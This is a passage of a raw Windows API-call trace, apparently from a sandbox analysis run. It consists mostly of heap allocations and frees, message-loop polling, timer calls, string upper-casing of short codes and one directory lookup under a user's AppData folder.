Size=0x8) returned 0x2a72278 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0204.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0204.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0204.735] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0204.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0204.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0204.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0204.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0204.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0204.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0204.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0204.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0204.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0204.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0204.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0204.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0204.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0204.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0204.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0204.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0204.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0204.737] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0204.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0204.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0204.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0204.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0204.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0204.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0204.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0204.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0204.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0204.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0204.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0204.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0204.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0204.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0204.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0204.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0204.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0204.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0204.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0204.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0204.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0204.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0204.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0204.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0204.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0204.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0204.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0204.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0204.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0204.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0204.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0204.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0204.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0204.740] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/UNP", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xd3023f2d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UNP", cAlternateFileName="")) returned 0x9e1eb8 [0204.740] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0204.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0204.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0204.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0204.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0204.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0204.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0204.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0204.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0204.742] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0204.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0204.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0204.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0204.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0204.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0204.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0204.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0204.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0204.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0204.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0204.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0204.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0204.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0204.743] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0204.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0204.743] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0204.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0204.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0204.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa888 [0204.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0204.747] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0204.747] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0204.747] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0204.747] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0204.747] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0204.747] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0204.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0204.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0204.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0204.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0204.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0204.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0204.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0204.747] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0204.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0204.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0204.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0204.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0204.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0204.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0204.748] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0204.748] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0204.748] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0204.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0204.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaaf8 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0204.748] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0204.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0204.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0204.748] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0204.748] HeapFree (in: 